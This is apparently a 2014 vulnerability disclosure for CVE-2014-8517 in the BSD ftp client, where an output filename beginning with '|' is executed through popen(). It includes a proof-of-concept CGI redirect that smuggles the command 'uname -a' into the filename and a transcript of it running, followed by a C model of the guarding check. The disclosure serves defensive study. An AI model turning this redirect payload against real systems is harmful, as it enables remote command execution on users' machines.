emin_int11

ftp command execution

Nov 5th, 2014
eminghuliev
FreeBSD FTP code execution
CVE ID: CVE-2014-8517

___ snippet ___
==== > fetch_url(const char *url, const char *proxyenv, char *proxyauth, char *wwwauth)
	/*
	 * Only trust filenames with special meaning if they came from
	 * the command line
	 */
	if (outfile == savefile) {
		if (strcmp(savefile, "-") == 0) {
			fout = stdout;
		} else if (*savefile == '|') {
			oldpipe = xsignal(SIGPIPE, SIG_IGN);
			fout = popen(savefile + 1, "w");
			if (fout == NULL) {
				warn("Can't execute `%s'", savefile + 1);
				goto cleanup_fetch_url;
			}
			closefunc = pclose;
		}
	}
If the output filename begins with the "|" symbol, the rest of the name is executed as a command.
If a name starting with the pipe symbol is sent, the popen function is called to execute it.
Proof:
else if (*savefile == '|') {
=== > fout = popen(savefile + 1, "w");

Description of the popen function:
popen - initiate pipe streams to or from a process
The popen() function shall execute the command specified by the string command. It shall create a pipe between the calling program and the executed command, and shall return a pointer to a stream that can be used to either read from or write to the pipe. The environment of the executed command shall be as if a child process were created within the popen() call using the fork() function, and the child invoked the sh utility using the call:

a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32 101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36

reference:
http://pubs.opengroup.org/onlinepubs/009695399/functions/popen.html
http://seclists.org/oss-sec/2014/q4/459

@st1ll_di3
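
Added example (not part of the original paste and not the ftp client's own code): a small C model of the output-sink decision, showing how the `outfile == savefile` check from the snippet keeps a server-supplied name, such as the redirect target in the transcript, from reaching popen(). `choose_sink`, `pct_decode` and the `guarded` flag are hypothetical names, and the unguarded branch is an assumption that models the behaviour seen in the transcript.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum sink { SINK_FILE, SINK_STDOUT, SINK_PIPE };

/* Decode %XX escapes in place, so "|uname%20-a" becomes "|uname -a". */
static void pct_decode(char *s) {
    char *o = s;
    for (; *s; s++) {
        if (*s == '%' && isxdigit((unsigned char)s[1]) && isxdigit((unsigned char)s[2])) {
            char hex[3] = { s[1], s[2], '\0' };
            *o++ = (char)strtol(hex, NULL, 16);
            s += 2;
        } else {
            *o++ = *s;
        }
    }
    *o = '\0';
}

/* Hypothetical model of the sink decision (no command is ever run here).
 * outfile:  name given with -o on the command line, or NULL
 * url_path: path of the final URL, i.e. after any redirect
 * guarded:  apply the "outfile == savefile" check from the snippet */
enum sink choose_sink(const char *outfile, const char *url_path, int guarded) {
    char derived[256];
    const char *slash = strrchr(url_path, '/');
    snprintf(derived, sizeof derived, "%s", slash ? slash + 1 : url_path);
    pct_decode(derived);
    const char *savefile = outfile ? outfile : derived;
    if (guarded && outfile != savefile)
        return SINK_FILE;    /* name chosen by the server: plain file only */
    if (strcmp(savefile, "-") == 0)
        return SINK_STDOUT;
    if (*savefile == '|')
        return SINK_PIPE;    /* the client would popen(savefile + 1, "w") */
    return SINK_FILE;
}

int main(void) {
    const char *redir = "/cgi-bin/|uname%20-a";  /* redirect target from the transcript */
    printf("no -o, unguarded: %d\n", choose_sink(NULL, redir, 0));   /* SINK_PIPE */
    printf("no -o, guarded:   %d\n", choose_sink(NULL, redir, 1));   /* SINK_FILE */
    printf("-o '|cat', guarded: %d\n", choose_sink("|cat", redir, 1)); /* SINK_PIPE */
    return 0;
}
```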